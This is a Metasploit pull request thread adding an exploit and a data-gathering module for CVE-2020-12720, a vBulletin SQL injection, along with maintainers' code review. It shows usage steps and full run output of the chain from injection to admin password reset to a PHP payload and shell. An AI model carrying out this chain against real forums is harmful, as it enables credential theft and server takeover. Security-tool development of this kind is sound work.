Add vbulletin_getindexablecontent SQLi to RCE exploit and auxillary gather module
rapid7/metasploit-framework pull request #13512
Opened 2020-05-23 08:30 UTC by Zenofex

This pull request adds 2 modules, a SQLi to RCE and a auxillary gather module, both for CVE-2020-12720 (SQL injection in vBulletin 5.2.0 - 5.6.1).

This module exploits a SQL injection vulnerability present in vBulletin 5.0.0 through 5.6.1 in the `getIndexableContent` function. This vulnerability is triggered through the `nodeId` variable and can be reached through multiple paths (listed below) but is exploited in this module utilizing the `/ajax/api/content_infraction/getIndexableContent` path.

This module has been tested successfully against vBulletin 5.6.1 running on Ubuntu Linux 19.04

## Verification

### Testing Exploit Module

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/vbulletin_getindexablecontent`
- [ ] `set RHOSTS [IP]`
- [ ] `set VHOST [HOSTNAME]`
- [ ] `set TARGETURI [PATH]`
- [ ] `check`
- [ ] Verify target is marked as vulnerable
- [ ] `run`
- [ ]  Verify shell is spawned

### Testing Auxillary Module

- [ ] Start `msfconsole`
- [ ] `use auxiliary/gather/vbulletin_getindexablecontent_sqli`
- [ ] `set RHOSTS [IP]`
- [ ] `set VHOST [HOSTNAME]`
- [ ] `set TARGETURI [PATH]`
- [ ] `run`
- [ ]  Verify user table data is dumped to disk

## Example Output

### Exploit module

```
msf5 > use exploit/multi/http/vbulletin_getindexablecontent 
msf5 exploit(multi/http/vbulletin_getindexablecontent) > set RHOSTS vb.local
RHOSTS => vb.local
msf5 exploit(multi/http/vbulletin_getindexablecontent) > set VHOST vb.local
VHOST => vb.local
msf5 exploit(multi/http/vbulletin_getindexablecontent) > set TARGETURI /vb5
TARGETURI => /vb5
msf5 exploit(multi/http/vbulletin_getindexablecontent) > set PAYLOAD 2
msf5 exploit(multi/http/vbulletin_getindexablecontent) > check
[*] 192.168.1.100:80 - The target appears to be vulnerable.
msf5 exploit(multi/http/vbulletin_getindexablecontent) > run

[*] Brute forcing to find a valid node id.
[+] Sucessfully found node at id 1
[*] Attempting to determine the vBulletin table prefix.
[*] Performing SQL injection on target to retrieve 'table_name' from 'information_schema.columns'.
[+] Sucessfully retrieved table to get prefix from vb5_language.
[*] Performing SQL injection on target to retrieve 'userid' from 'vb5_administrator'.
[*] Performing SQL injection on target to retrieve 'username' from 'vb5_user'.
[*] Performing SQL injection on target to retrieve 'token' from 'vb5_user'.
[*] Performing SQL injection on target to retrieve 'email' from 'vb5_user'.
[+] Retrieved administrator uid: 1 user: administrator email: zenofex@exploitee.rs and password: $2y$15$IKz0ra/N2WrJr4BZZMExIOwIET.4Tz8Wni20BMEHjG/A.k9tuOK.W
[*] Sending request to '/vb5/ajax/api/hv/fetchHvType' to get human verification type.
[+] Retrieved HV/captcha type of 'Image'.
[*] Making request to '/vb5/ajax/api/hv/generateToken' to retrieve HV token.
[+] Retrieved '85885c3fafb61b91cb3d2959e13ffe07' human verification token.
[*] Using HV token '85885c3fafb61b91cb3d2959e13ffe07' and SQLinjection to determine HV answer.
[*] Performing SQL injection on target to retrieve 'answer' from 'vb5_humanverify'.
[+] Retrieved '4w8CPc' answer to HV token '85885c3fafb61b91cb3d2959e13ffe07'.
[*] Making request to '/vb5/auth/lostpw' to begin lost password process.
[*] Performing SQL injection on target to retrieve 'activationid' from 'vb5_useractivation'.
[*] Sending reset password request to '/vb5/auth/reset-password'.
[+] User with userid '1' successfully reset password to 'dSxTtxI7yh'.
[*] Making login request to '/vb5/auth/ajax-login' with username: 'administrator' and password: 'dSxTtxI7yh'.
[+] Successfully logged in as administrator .
[*] Making request to '/vb5/ajax/activate-sitebuilder' to activate site-builder functionality.
[+] Successfully enabled site-builder functionality.
[*] Making login request to '/vb5/auth/ajax-login' with username: 'administrator' and password: 'dSxTtxI7yh'.
[+] Successfully logged in as administrator cplogin.
[*] Making request to '/vb5/ajax/api/widget/saveNewWidgetInstance' to create new widget.
[+] Created new widget instance.
[*] Making request to '/vb5/ajax/api/widget/saveAdminConfig' to add payload to widget.
[+] Successfully added payload to widget.
[*] Sending request to '/vb5/admin/savepage' to save new page at 'OToB9nTU'.
[+] Page succesfully create and should be accessible at '/vb5/OToB9nTU'.
[+] Executing PHP payload (230 bytes) at /vb5/OToB9nTU.
[*] Sending request to '/vb5/OToB9nTU' to execute payload.
[*] Sending delete page request to '/vb5/ajax/api/page/delete'.
[+] Successfully deleted page with pageid: 148
[*] Started bind TCP handler against 192.168.1.100:4444
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.100:4444) at 2020-05-22 21:24:42 -0500

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

### Auxillary module

```
msf5 > use auxiliary/gather/vbulletin_getindexablecontent_sqli
msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > set VHOST vb.local
VHOST => vb.local
msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > set TARGETURI /
TARGETURI => /vb5
msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > run

[*] Running module against 192.168.1.100
[*] Brute forcing to find a valid node id.
[+] Sucessfully found node at id 1
[*] Attempting to determine the vBulletin table prefix.
[+] Sucessfully retrieved table to get prefix from vb5_language.
[*] Getting table columns for vb5_user
[+] Retrieved 78 columns for vb5_user
[*] Dumping table vb5_user
[*] Table contains 1 rows, dumping (this may take a while).
[+] Found credential: administrator:$2y$15$I5t0BGBeYaYGbaRhhBr8g.EBax846Jx3B6ady..nwuPxOWAYicYvi (Email: zenofex@exploitee.rs)
[+] Retrieved 1 rows for vb5_user
[+] Saved file to: /home/zenofex/.msf4/loot/20200522180431_default_192.168.1.100_vb5_user_305077.txt
[*] Auxiliary module execution completed```

2020-05-26 21:28 UTC, smcintyre-r7 requested changes
Left a few comments, mostly around grammatical changes. Would you also mind addressing linting issues from `msftidy_docs`?

<details>
<summary>msftidy_docs Output</summary>

```
[smcintyre@localhost metasploit-framework.pr]$ tools/dev/msftidy_docs.rb documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md
documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md - [WARNING] Docs should start with ## Vulnerable Application
documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md - [WARNING] Descriptions should be within Vulnerable Application, or an H3 sub-section of Vulnerable Application
documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md - [WARNING] H2 headings in incorrect order. Should be: Vulnerable Application, Verification Steps, Options, Scenarios
documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md:3 - [WARNING] Line too long (353). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.
documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md:19 - [WARNING] Spaces at EOL
documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md:19 - [WARNING] Line too long (156). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.
documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md:20 - [WARNING] Line too long (194). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.
documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md:29 - [WARNING] Options should use ### instead of bolds (**)
documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md:31 - [WARNING] Line too long (148). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.
documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md:33 - [WARNING] Options should use ### instead of bolds (**)
documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md:35 - [WARNING] Spaces at EOL
documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md:37 - [WARNING] Options should use ### instead of bolds (**)
documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md:41 - [WARNING] Options should use ### instead of bolds (**)
documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md:45 - [WARNING] Options should use ### instead of bolds (**)
[smcintyre@localhost metasploit-framework.pr]$ tools/dev/msftidy_docs.rb documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md
documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md - [WARNING] Docs should start with ## Vulnerable Application
documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md - [WARNING] Descriptions should be within Vulnerable Application, or an H3 sub-section of Vulnerable Application
documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md - [WARNING] H2 headings in incorrect order. Should be: Vulnerable Application, Verification Steps, Options, Scenarios
documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md:3 - [WARNING] Line too long (353). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.
documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md:19 - [WARNING] Spaces at EOL
documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md:19 - [WARNING] Line too long (156). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.
documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md:24 - [WARNING] Spaces at EOL
documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md:24 - [WARNING] Line too long (1555). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.
documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md:26 - [WARNING] Spaces at EOL
documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md:26 - [WARNING] Line too long (227). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.
documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md:28 - [WARNING] Spaces at EOL
documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md:28 - [WARNING] Line too long (327). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.
documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md:30 - [WARNING] Line too long (168). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.
documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md:34 - [WARNING] Line too long (937). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.
documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md:36 - [WARNING] Line too long (715). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.
documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md:45 - [WARNING] Options should use ### instead of bolds (**)
documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md:49 - [WARNING] Options should use ### instead of bolds (**)
documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md:51 - [WARNING] Spaces at EOL
documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md:53 - [WARNING] Options should use ### instead of bolds (**)
documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md:57 - [WARNING] Options should use ### instead of bolds (**)
documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md:61 - [WARNING] Options should use ### instead of bolds (**)
[smcintyre@localhost metasploit-framework.pr]$
```
</details>

2020-05-26 21:28 UTC, smcintyre-r7 commented on modules/exploits/multi/http/vbulletin_getindexablecontent.rb
> +    print_good("Page succesfully create and should be accessible at '#{normalize_uri(target_uri.path, payload_url.to_s)}'.")
`create` should be `created` here, e.g. "Page successfully *created* and should be..."

2020-05-26 21:28 UTC, smcintyre-r7 commented on modules/exploits/multi/http/vbulletin_getindexablecontent.rb
> +    end
This should use the `Msf::Exploit::Remote::AutoCheck` mixin which standardizes this functionality. More importantly it also provides the user an option to skip the check and run the exploit anyways.

2020-05-26 21:28 UTC, smcintyre-r7 commented on modules/exploits/multi/http/vbulletin_getindexablecontent.rb
> +      return CheckCode::Unknown
I don't think the exploit method should be returning a `CheckCode` constant. This should probably be `fail_with` instead.

2020-05-26 22:38 UTC, Zenofex commented
Thank you @smcintyre-r7 for your review and recommendations. I admittedly had not run msftidy-docs on the documentation until now but the documentation should now be cleaned up. 

I've fixed each recommendation in the most recent push.

2020-05-27 14:27 UTC, Zenofex commented on documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md
> +The module can now begin to lever the administrator access for remote command execution. This begins by first creating a new widget instance, this widget instance is of a `widget_php` type (a special
Fixed, thank you.

2020-05-27 14:27 UTC, Zenofex commented on modules/exploits/multi/http/vbulletin_getindexablecontent.rb
> +          [ 'vBulletin 5.2+', {}]
switched to automatic, thank you.

2020-05-27 14:28 UTC, Zenofex commented on modules/exploits/multi/http/vbulletin_getindexablecontent.rb
> +    print_good("Page succesfully create and should be accessible at '#{normalize_uri(target_uri.path, payload_url.to_s)}'.")
Fixed, thank you.

2020-05-27 14:28 UTC, Zenofex commented on modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.rb
> +          [ 'vBulletin 5.2+', {}]
Switched to automatic, thank you.

2020-05-27 14:29 UTC, Zenofex commented on modules/exploits/multi/http/vbulletin_getindexablecontent.rb
> +    end
Added AutoCheck mixin, thank you.

2020-05-27 14:29 UTC, Zenofex commented on modules/exploits/multi/http/vbulletin_getindexablecontent.rb
> +      return CheckCode::Unknown
Now using fail_with, thank you.

2020-05-28 03:10 UTC, wvu-r7 commented on modules/exploits/multi/http/vbulletin_getindexablecontent.rb
> +    end
> standardizes

😅

2020-05-28 03:33 UTC, wvu requested changes
Clean work. I'm not here to nitpick Rubyisms. This is an excellent contribution.

2020-05-28 03:33 UTC, wvu-r7 commented on modules/exploits/multi/http/vbulletin_getindexablecontent.rb
> +    fail_with(Failure::UnexpectedReply, "Could not login with username: '#{admin_user}' and password: '#{new_pass}'.") unless login_token
```suggestion
    fail_with(Failure::NoAccess, "Could not login with username: '#{admin_user}' and password: '#{new_pass}'.") unless login_token
```

2020-05-28 03:33 UTC, wvu-r7 commented on modules/exploits/multi/http/vbulletin_getindexablecontent.rb
> +    fail_with(Failure::UnexpectedReply, "Could not login to CP with username: '#{admin_user}' and password: '#{new_pass}'.") unless login_token
```suggestion
    fail_with(Failure::NoAccess, "Could not login to CP with username: '#{admin_user}' and password: '#{new_pass}'.") unless login_token
```

2020-05-28 03:33 UTC, wvu-r7 commented on modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.rb
> +        'DisclosureDate' => 'Mar 12 2020',
```suggestion
        'DisclosureDate' => '2020-03-12',
```

2020-05-28 03:33 UTC, wvu-r7 commented on modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.rb
> +        'Targets' => [
Auxiliary modules do not have targets, only actions, which haven't been set:

```
msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > show targets
[-] No exploit module selected.
msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------


msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) >
```

2020-05-28 03:33 UTC, wvu-r7 commented on modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.rb
> +        'Payload' => {},
```suggestion
```

These are for exploits.

2020-05-28 03:33 UTC, wvu-r7 commented on modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.rb
> +        'Arch' => ARCH_PHP,
```suggestion
```

These are for exploits.

2020-05-28 03:33 UTC, wvu-r7 commented on modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.rb
> +        'DefaultTarget' => 0
This is for exploits and should be `DefaultAction`.

2020-05-28 03:33 UTC, wvu-r7 commented on modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.rb
> +    parsed_resp = JSON.parse(res.body.to_s)
You may use `res.get_json_document` here and elsewhere, and it will `rescue JSON::ParserError`.

2020-05-28 03:33 UTC, wvu-r7 commented on modules/exploits/multi/http/vbulletin_getindexablecontent.rb
> +          [ 'Automatic', {}]
```suggestion
          ['Automatic', {}]
```

2020-05-28 03:33 UTC, wvu-r7 commented on modules/exploits/multi/http/vbulletin_getindexablecontent.rb
> +        'Payload' => {},
```suggestion
```

2020-05-28 03:33 UTC, wvu-r7 commented on modules/exploits/multi/http/vbulletin_getindexablecontent.rb
> +        'DisclosureDate' => 'Mar 12 2020',
```suggestion
        'DisclosureDate' => '2020-03-12',
```

2020-05-28 03:33 UTC, wvu-r7 commented on modules/exploits/multi/http/vbulletin_getindexablecontent.rb
> +    end
This could probably use guard clauses to unnest the logic.

2020-05-28 03:33 UTC, wvu-r7 commented on modules/exploits/multi/http/vbulletin_getindexablecontent.rb
> +    end
Can this logic be simplified, perhaps with early return or guard clauses?

2020-05-28 15:15 UTC, Zenofex commented on modules/exploits/multi/http/vbulletin_getindexablecontent.rb
> +    end
I added a couple guard classes to the code above, let me know if you think it needs more. Thank you!

2020-05-28 15:16 UTC, Zenofex commented on modules/exploits/multi/http/vbulletin_getindexablecontent.rb
> +    end
Cleaned up check logic (specifically with guard clauses). Thank you!

2020-05-28 15:16 UTC, Zenofex commented on modules/exploits/multi/http/vbulletin_getindexablecontent.rb
> +        'DisclosureDate' => 'Mar 12 2020',
Fixed date formatting. Thanks!

2020-05-28 15:17 UTC, Zenofex commented on modules/exploits/multi/http/vbulletin_getindexablecontent.rb
> +        'Payload' => {},
Removed, thank you!

2020-05-28 15:17 UTC, Zenofex commented on modules/exploits/multi/http/vbulletin_getindexablecontent.rb
> +          [ 'Automatic', {}]
Removed space, thank you.

2020-05-28 15:19 UTC, Zenofex commented on modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.rb
> +        'Arch' => ARCH_PHP,
Removed, thank you.

2020-05-28 15:19 UTC, Zenofex commented on modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.rb
> +        'Payload' => {},
Removed, thank you.

2020-05-28 15:21 UTC, Zenofex commented on modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.rb
> +        'Targets' => [
Added a DumpAll action and set the default action to DumpUser. Then removed the DumpAll module boolean option, fixed the docs and added it into the scenario. Thanks

2020-05-28 15:21 UTC, Zenofex commented on modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.rb
> +        'DisclosureDate' => 'Mar 12 2020',
Fixed date formatting. Thanks!

2020-05-28 15:22 UTC, Zenofex commented on modules/exploits/multi/http/vbulletin_getindexablecontent.rb
> +    fail_with(Failure::UnexpectedReply, "Could not login with username: '#{admin_user}' and password: '#{new_pass}'.") unless login_token
Whoops, fixed this use of Failure::UnexpectedReply to Failure::NoAccess. Thanks

2020-05-28 15:22 UTC, Zenofex commented on modules/exploits/multi/http/vbulletin_getindexablecontent.rb
> +    fail_with(Failure::UnexpectedReply, "Could not login to CP with username: '#{admin_user}' and password: '#{new_pass}'.") unless login_token
Also fixed this use of Failure::UnexpectedReply to Failure::NoAccess. Thanks

2020-05-28 15:34 UTC, wvu requested changes

2020-05-28 15:34 UTC, wvu-r7 commented on modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.rb
> +    end
```suggestion
    end
    
    nil
```

2020-05-28 15:34 UTC, wvu-r7 commented on modules/exploits/multi/http/vbulletin_getindexablecontent.rb
> +    end
```suggestion
    end

    nil
```

2020-05-28 15:34 UTC, wvu-r7 commented on modules/exploits/multi/http/vbulletin_getindexablecontent.rb
> +
```suggestion
```

2020-05-28 16:17 UTC, Zenofex commented on modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.rb
> +    parsed_resp = JSON.parse(res.body.to_s)
Alright, changed every used of JSON.parse to res.get_json_document then did a bunch of testing. Thank you!

2020-05-28 16:17 UTC, Zenofex commented on modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.rb
> +    end
fixed, thank you!

2020-05-28 16:18 UTC, Zenofex commented on modules/exploits/multi/http/vbulletin_getindexablecontent.rb
> +    end
fixed, thanks.

2020-05-28 16:18 UTC, Zenofex commented on modules/exploits/multi/http/vbulletin_getindexablecontent.rb
> +
removed, thank you.

2020-05-28 16:20 UTC, Zenofex commented
Alright, fixed most recent round of recommendations, please let me know if there are any more. 

Also, I'm not sure if I'm supposed to do anything else to "resolve" the recommendations from @smcintyre-r7.

Thank you all for the assistance in this PR.

2020-05-28 16:42 UTC, wvu approved these changes

2020-05-28 16:42 UTC, wvu-r7 commented
@smcintyre-r7: Can you approve the changes or dismiss your review? Thanks!

2020-06-01 20:43 UTC, Zenofex commented
@smcintyre-r7 I still see that "changes are requested" by you, is there anything else you need from me?

2020-06-01 20:48 UTC, smcintyre-r7 commented
@Zenofex the primary hold up is getting access to a testing environment to see the module in action. Do you have any suggestions on that? If we can't do that then would it be possible for you to send a pcap file of a run against a non-HTTP install for us to inspect? You can send it to msfdev@metasploit.com.

2020-06-01 20:50 UTC, smcintyre-r7 approved these changes

2020-06-01 20:51 UTC, Zenofex commented
@smcintyre-r7 Easy enough, I can provide you a public endpoint you can test against or the PCAP option, which would you prefer?

2020-06-01 20:53 UTC, smcintyre-r7 commented
I'd prefer a public end point if you have that available. If you want to keep the details private, feel free to send me an email directly at smcintyre@metasploit.com.

2020-06-01 20:58 UTC, Zenofex commented
@smcintyre-r7 I've sent an email over your way with some testing server information. Thanks in advance!

2020-06-01 21:11 UTC, smcintyre-r7 commented
I'm sorry, my Metasploit email doesn't look like it's working. Would you be able to resend it to msfdev@metasploit.com? Sorry for the confusion.

2020-06-01 21:14 UTC, Zenofex commented
@smcintyre-r7 I've sent the info over to the new email as well, thank you!

2020-06-01 22:02 UTC, smcintyre-r7 commented
Alright, I was able to successfully test both modules with a 5.6.1 server that was provided to me by @Zenofex. I won't be posting the output because there's quite a bit that could be considered sensitive like the server information as well as recovered credentials.

At this point everything looks good, and I'll get this landed in a moment. Thank you @Zenofex !

2020-06-01 22:03 UTC, merged

2020-06-01 22:05 UTC, smcintyre-r7 commented
# Release Notes
This adds two new modules to exploit a SQL injection vulnerability in vBulletin 5.6.1. One module is an auxiliary module capable of recovering the user table, while the other is an exploit that will deliver a PHP payload. The vulnerability that both leverage is identified as CVE-2020-12720.

2020-06-02 13:08 UTC, wvu-r7 commented
Thanks for the contribution!